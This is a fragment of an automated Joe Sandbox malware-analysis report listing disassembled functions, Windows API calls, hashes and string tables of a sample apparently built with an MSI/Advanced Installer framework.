                                                    • Opcode Fuzzy Hash: bc54a1ddea7e3d52042b13918276ba30cf097af290eab046b346aa4c2c99abba
                                                    • Instruction Fuzzy Hash: 79512771D0825C9BDB218B28DD84AEA7FB8FB55304F2409FDE59AD7182C335AD46DB20
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00471B30 Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00471DA0: __Init_thread_footer.LIBCMT ref: 00471E16
                                                      • Part of subcall function 00520372: EnterCriticalSection.KERNEL32(00637DCC,?,?,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340,?,?), ref: 0052037D
                                                      • Part of subcall function 00520372: LeaveCriticalSection.KERNEL32(00637DCC,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340,?,?), ref: 005203BA
                                                    • __Init_thread_footer.LIBCMT ref: 00471C10
                                                      • Part of subcall function 00520328: EnterCriticalSection.KERNEL32(00637DCC,?,?,0035ACA7,006389FC,005A5FA0), ref: 00520332
                                                      • Part of subcall function 00520328: LeaveCriticalSection.KERNEL32(00637DCC,?,0035ACA7,006389FC,005A5FA0), ref: 00520365
                                                      • Part of subcall function 00520328: RtlWakeAllConditionVariable.NTDLL ref: 005203DC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterInit_thread_footerLeave$ConditionVariableWake
                                                    • String ID:
                                                    • API String ID: 984842325-0
                                                    • Opcode ID: dbb035cffbcceffd9d3f3295611b9db7d38052395f946ddf3ee97db23906b561
                                                    • Instruction ID: cacf260477999a2fccb4ace7fd78111e83f311475e9521ca09f03cd70ed32233
                                                    • Opcode Fuzzy Hash: dbb035cffbcceffd9d3f3295611b9db7d38052395f946ddf3ee97db23906b561
                                                    • Instruction Fuzzy Hash: 3531F571584604DFE725DF48ED82BCD77A2FB01714F20661AE4295B7E0DB7A68008FA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004B1950 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 03844a7cfe8c4f5cb9a635742cd6961c6029d49aefacc4465308f48d6920e05e
                                                    • Instruction ID: f5407a7c57fa2996a77579f3511bbd11ba8d4366367572c180c7f278bacbe77d
                                                    • Opcode Fuzzy Hash: 03844a7cfe8c4f5cb9a635742cd6961c6029d49aefacc4465308f48d6920e05e
                                                    • Instruction Fuzzy Hash: A41102B2300A629F87209F8AC4E0D97F7A8FF54700382412AE9519B731C724FC15C7E4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C8D40 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00368CF0: EnterCriticalSection.KERNEL32(0063E7BC), ref: 00368D2C
                                                      • Part of subcall function 00368CF0: GetCurrentThreadId.KERNEL32 ref: 00368D40
                                                      • Part of subcall function 00368CF0: LeaveCriticalSection.KERNEL32(0063E7BC), ref: 00368D7F
                                                    • SetWindowLongW.USER32(?,00000004,00000000), ref: 003C8D8D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$CurrentEnterLeaveLongThreadWindow
                                                    • String ID:
                                                    • API String ID: 3550545212-0
                                                    • Opcode ID: 2411c05563d0c4f3e00cccb640e1c745c2d2c0e65d43304673930e2d9f996c08
                                                    • Instruction ID: 3c6c1e8e8bcff7a9adf350a9880e0cbdb99e6cb3d2c036920ca873259a667c7a
                                                    • Opcode Fuzzy Hash: 2411c05563d0c4f3e00cccb640e1c745c2d2c0e65d43304673930e2d9f996c08
                                                    • Instruction Fuzzy Hash: 27F0D1722012125BD632AF68A848E6FBBE8EF847A1B004829F685C7151CB20CC05D7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00471DA0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00520372: EnterCriticalSection.KERNEL32(00637DCC,?,?,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340,?,?), ref: 0052037D
                                                      • Part of subcall function 00520372: LeaveCriticalSection.KERNEL32(00637DCC,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340,?,?), ref: 005203BA
                                                      • Part of subcall function 00471E40: RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00020119,00000000), ref: 00471EAE
                                                      • Part of subcall function 00471E40: RegQueryValueExW.KERNEL32(00000000,CurrentMajorVersionNumber,00000000,00000000,?,?), ref: 00471EF5
                                                      • Part of subcall function 00471E40: RegQueryValueExW.KERNEL32(00000000,CurrentMinorVersionNumber,00000000,00000000,?,00000004), ref: 00471F14
                                                      • Part of subcall function 00471E40: RegQueryValueExW.ADVAPI32(00000000,CurrentVersion,00000000,00000000,?,?), ref: 00471F43
                                                      • Part of subcall function 00471E40: RegQueryValueExW.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,?,?), ref: 00471FB8
                                                    • __Init_thread_footer.LIBCMT ref: 00471E16
                                                      • Part of subcall function 00520328: EnterCriticalSection.KERNEL32(00637DCC,?,?,0035ACA7,006389FC,005A5FA0), ref: 00520332
                                                      • Part of subcall function 00520328: LeaveCriticalSection.KERNEL32(00637DCC,?,0035ACA7,006389FC,005A5FA0), ref: 00520365
                                                      • Part of subcall function 00520328: RtlWakeAllConditionVariable.NTDLL ref: 005203DC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CriticalQuerySectionValue$EnterLeave$ConditionInit_thread_footerOpenVariableWake
                                                    • String ID:
                                                    • API String ID: 3563064969-0
                                                    • Opcode ID: 1834d12dbeeb919e8119ca263b13f4302ddf298819e61e3f164e07a718fbc284
                                                    • Instruction ID: 92bbd58a5f539bfafbaa521406b55e99c753142517b7f2f73ff6c146decb7c8c
                                                    • Opcode Fuzzy Hash: 1834d12dbeeb919e8119ca263b13f4302ddf298819e61e3f164e07a718fbc284
                                                    • Instruction Fuzzy Hash: DD01F271B40644ABC711DF98DA02B99B7A5F705730F104B3AF927977D1CB3A690087A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004ACBD0 Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,D13B3340,00000000,?,?,00000000,0059487E,000000FF,?,80004005), ref: 004ACC58
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: FileWrite
                                                    • String ID:
                                                    • API String ID: 3934441357-0
                                                    • Opcode ID: 17d72d393d69b4d120e8b6b03485c028f16a3fdc5a0b906816a98f7b0e03b6e6
                                                    • Instruction ID: 0bd42b790edc2de3a4718b91dfac4e5d79e1a0fa4881eaa06a01110115e09e77
                                                    • Opcode Fuzzy Hash: 17d72d393d69b4d120e8b6b03485c028f16a3fdc5a0b906816a98f7b0e03b6e6
                                                    • Instruction Fuzzy Hash: FDF04F71600654BFDB10CF19CC85FABB7ADFB5A724F044219F925E72D0DBB4AD048A94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0035A850 Relevance: 1.5, APIs: 1, Instructions: 34memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00521BFA: RaiseException.KERNEL32(E06D7363,00000001,00000003,D13B3340,?,?,004AC2E8,80004005,D13B3340,?,?), ref: 00521C5A
                                                    • RtlAllocateHeap.NTDLL(?,00000000,?,D13B3340,00000000,00547F70,000000FF,?,?,0062EFDC,?,004AC2E8,80004005,D13B3340,?,?), ref: 0035A89A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AllocateExceptionHeapRaise
                                                    • String ID:
                                                    • API String ID: 3789339297-0
                                                    • Opcode ID: d554cedadab4d03512e8a53871c8e1466e9eee66e8ee2b1a7e719d29dd8c8d50
                                                    • Instruction ID: b4a59e9df4bd5c96924e9807131943de05e0c90ce30cb406044e82e30fb16dca
                                                    • Opcode Fuzzy Hash: d554cedadab4d03512e8a53871c8e1466e9eee66e8ee2b1a7e719d29dd8c8d50
                                                    • Instruction Fuzzy Hash: B6F0A731A44648BFC705CF54DD05F56BFB9FB09B14F004679F915866A0DB36A8049A44
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00538247 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00000000,00000000,00535FF3,?,0053A198,?,00000000,?,00529D85,00000000,00535FF3,?,?,?,?,00535DED), ref: 00538279
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: f44c46d92821612de8f33a583de4cd56ffdc7a387cae562837b1e97791dbb286
                                                    • Instruction ID: 8db28120e27b958ecdc97cd79b3a456fdf657a5d88e12680fae34d2d208c61b3
                                                    • Opcode Fuzzy Hash: f44c46d92821612de8f33a583de4cd56ffdc7a387cae562837b1e97791dbb286
                                                    • Instruction Fuzzy Hash: 94E06D39545F216ADF2A2766AC08BBB7F49BF823A0F294221FD15960D1EF60DC0485E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 00354772 Relevance: 298.4, Strings: 237, Instructions: 2113COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $ $$ *$ /$(!$(&$(,$(7$0#$0($0)$0.$100$100$100$100$10000$10000$10000$100000$100000$12000$12000$12000$12000$12000$12000$12000$12000$12000$12000$120000$120000$1500$1500$1500$1500$1500$15000$15000$15000$15000$15000$15000$1500000$1500000$1800$1800$1800$2000$2000$2000$2000$2000$2000$2000$2000$20000$20000$200000$200000$3000$3000$3000$3000$3000$3000$3000$3000$3000$3000$30000$30000$30000$3000000$3000000$500$500$5000$5000$6000$6000$8%$8+$8000$8000$8000$80$@"$@'$@-$AI_AppSearchEx$AI_ChainProductsPseudo$AI_CountRowAction$AI_DefaultActionCost$AI_DownloadPrereq$AI_ExtractPrereq$AI_Game$AI_Game$AI_Game$AI_GxInstall$AI_GxUninstall$AI_InstallPostPrerequisite$AI_InstallPrerequisite$AI_PreRequisite$AI_ProcessAccounts$AI_ProcessGroups$AI_ProcessTasks$AI_ScheduledTasks$AI_UninstallAccounts$AI_UninstallGroups$AI_UninstallTasks$AI_UserAccounts$AI_UserGroups$AI_XmlAttribute$AI_XmlElement$AI_XmlInstall$AI_XmlUninstall$AppId$AppId$AppId$BindImage$Complus$Complus$Component_$CreateFolder$CreateFolders$CreateShortcuts$DuplicateFile$DuplicateFiles$Environment$Extension$Feature$Feature$Feature_$File$File$File$FileSize$Font$Font$H$$H*$H/$IniFile$IniFile$IniFile$InstallFiles$InstallFinalize$InstallInitialize$InstallODBC$InstallServices$Location$MIME$MIME$MIME$MoveFile$MoveFiles$MsiAssembly$MsiConfigureServices$MsiPublishAssemblies$ODBCDataSource$ODBCDriver$ODBCTranslator$Options$Options$Options$P!$P&$P,$P7$Patch$Patch$PatchFiles$PatchSize$ProgId$ProgId$ProgId$PublishComponent$PublishComponents$PublishFeatures$RegisterClassInfo$RegisterComPlus$RegisterExtensionInfo$RegisterFonts$RegisterMIMEInfo$RegisterProgIdInfo$RegisterTypeLibraries$Registry$RemoveDuplicateFiles$RemoveEnvironmentStrings$RemoveFile$RemoveFiles$RemoveFolders$RemoveIniFile$RemoveIniValues$RemoveShortcuts$SelfReg$SelfReg$SelfRegModules$ServiceControl$ServiceInstall$Shortcut$StartServices$TypeLib$TypeLib$UnregisterClassInfo$UnregisterExtensionInfo$UnregisterMIMEInfo$UnregisterProgIdInfo$WriteEnvironmentStrings$WriteIniValues$WriteRegistryValues$X $X#$X($X)$X.$`+$`0$`6$h"$h'$h-$p$$p*$p/$x!$x&$x,$~$"$$$'$*$-$/
                                                    • API String ID: 0-1880133967
                                                    • Opcode ID: ff0160fa4a169b49b42be03a3beb2b0ca0e99aa3a9f1cd480c265e4a948b0788
                                                    • Instruction ID: c64a9d96874e32bbc324180706b23f482a8e92a0b144e19607c5b50dabddee20
                                                    • Opcode Fuzzy Hash: ff0160fa4a169b49b42be03a3beb2b0ca0e99aa3a9f1cd480c265e4a948b0788
                                                    • Instruction Fuzzy Hash: 9A23D220A443C4D6D712DFF84D1AB5D6E63AB62315F14674AB2D13F3E2DBB00688A7D2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00352EA0 Relevance: 89.9, Strings: 71, Instructions: 1105COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $0$12000$12000$12000$12000$15000$15000$15000$2000$2000$3000$3000$3000$3000$3000$3000$3000$30000$30000$800$800$8000$8000$8000$8$8$AppSearch$Complus$Complus$Component$Component_$CostFinalize$CostInitialize$Feature$Feature$Feature_$File$File$FileCost$Font$Font$H$InstallValidate$MsiUnpublishAssemblies$ODBCDataSource$ODBCDriver$ODBCTranslator$ProcessComponents$PublishComponent$Registry$RemoveExistingProducts$RemoveODBC$RemoveRegistry$RemoveRegistryValues$SelfReg$SelfReg$SelfUnregModules$ServiceControl$StopServices$UnpublishComponents$UnpublishFeatures$UnregisterComPlus$UnregisterFonts$X$`%$`$h$p$u$x
                                                    • API String ID: 0-2370279709
                                                    • Opcode ID: 41e24130abdad17d222c819939d9c1bb1f21ca0672607f1ff78e6bb4c6cff713
                                                    • Instruction ID: ed79c7edf5397cfd417f5c7c802bceac1bde82980899f43df1ac949f4cf38a24
                                                    • Opcode Fuzzy Hash: 41e24130abdad17d222c819939d9c1bb1f21ca0672607f1ff78e6bb4c6cff713
                                                    • Instruction Fuzzy Hash: 89C27060E5578496E341CF70ED5A7967BA3AB62309F24A309F1452A2E1DBF412C8CFE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0049FBF0 Relevance: 46.0, APIs: 16, Strings: 10, Instructions: 517fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNEL32(006394F4,C0000000,00000003,00000000,00000004,00000080,00000000,D13B3340,006394D0,006394E8,?), ref: 0049FC70
                                                    • GetLastError.KERNEL32 ref: 0049FC8D
                                                    • OutputDebugStringW.KERNEL32(00000000,00000020), ref: 0049FD06
                                                    • OutputDebugStringW.KERNEL32(00000000,?,0000001C), ref: 0049FE0A
                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0000001C), ref: 0049FE7B
                                                    • WriteFile.KERNEL32(00000000,00E1B780,?,00000000,00000000,?,0000001C), ref: 0049FEAB
                                                    • WriteFile.KERNEL32(00000000,000000B7,?,00000000,00000000,005B5F2C,00000002), ref: 0049FF56
                                                    • FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0000001C), ref: 0049FF5F
                                                    • FlushFileBuffers.KERNEL32(00000000,?,0000001C), ref: 0049FEB0
                                                      • Part of subcall function 0035A140: FindResourceW.KERNEL32(00000000,?,00000006,?,?,000000A0,80070057,8007000E,80004005,00371A24,00000000,?,?,?,*.*), ref: 0035A163
                                                    • OutputDebugStringW.KERNEL32(00000000,?,0000001D), ref: 004A0053
                                                    • WriteFile.KERNEL32(00000000,00000000,00000002,?,00000000,?,0000001D), ref: 004A00D9
                                                    • FlushFileBuffers.KERNEL32(00000000,?,0000001D), ref: 004A00E4
                                                    • WriteFile.KERNEL32(00000000,000000FF,?,00000000,00000000,005B5F2C,00000002,?,?,CPU: ,00000005), ref: 004A0158
                                                    • FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0000001C), ref: 004A0161
                                                    • WriteFile.KERNEL32(00000000,000000B7,?,00000000,00000000,005B5F2C,00000002), ref: 004A01E6
                                                    • FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0000001C), ref: 004A01EF
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: File$BuffersFlushWrite$DebugOutputString$Init_thread_footer$CreateErrorFindHeapLastPointerProcessResource
                                                    • String ID: ,_[$CPU: $LOGGER->Creating LOG file at:$LOGGER->Reusing LOG file at:$LOGGER->failed to create LOG at:$OS Version: %u.%u.%u SP%u (%s) [%s]$server$workstation$x64$x86
                                                    • API String ID: 4051163352-3468187980
                                                    • Opcode ID: 1116a6ac1799d9f6a65944f850801308f633d00df17b7eb2f1bc9debebe6bb8c
                                                    • Instruction ID: db15cb28dffc239e768313e174ae708b284c50065e853d2f42cea8d0643c3ca6
                                                    • Opcode Fuzzy Hash: 1116a6ac1799d9f6a65944f850801308f633d00df17b7eb2f1bc9debebe6bb8c
                                                    • Instruction Fuzzy Hash: 0D12BE70A016099FDB10DF68CC49BAEBBB4FF55314F1482A9E805EB2A2DB74DD08DB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0038B720 Relevance: 39.6, APIs: 14, Strings: 8, Instructions: 1082stringthreadsleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcmpiW.KERNEL32(?,?,msix,00000004,?,?,?,?,?, ?(-|/)+q,005B7BBE), ref: 0038BAEE
                                                    • lstrcmpiW.KERNEL32(?,?,msixbundle,0000000A,msix,00000004,?,?,?,?,?, ?(-|/)+q,005B7BBE), ref: 0038BC6E
                                                    • GetCurrentThreadId.KERNEL32 ref: 0038BE2B
                                                    • std::locale::_Init.LIBCPMT ref: 0038B827
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    • Sleep.KERNEL32(000007D0,?,?,?,?,?,?,?,?,?,?, ?(-|/)+q,005B7BBE), ref: 0038C183
                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 0038C1EF
                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 0038C1F6
                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 0038C1FD
                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 0038C213
                                                    • GetCurrentThreadId.KERNEL32 ref: 0038C3FE
                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 0038C50F
                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 0038C516
                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 0038C51D
                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 0038C524
                                                      • Part of subcall function 003711B0: FindClose.KERNEL32(00000000), ref: 003712EF
                                                      • Part of subcall function 003711B0: PathIsUNCW.SHLWAPI(?,*.*,00000000), ref: 003713A7
                                                      • Part of subcall function 0046FDA0: FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,D13B3340,?,00000000), ref: 0046FDEB
                                                      • Part of subcall function 0046FDA0: GetLastError.KERNEL32(?,00000000), ref: 0046FDF5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Cpp_errorThrow_std::_$CurrentInit_thread_footerThreadlstrcmpi$CloseErrorFindFormatHeapInitLastMessagePathProcessSleepstd::locale::_
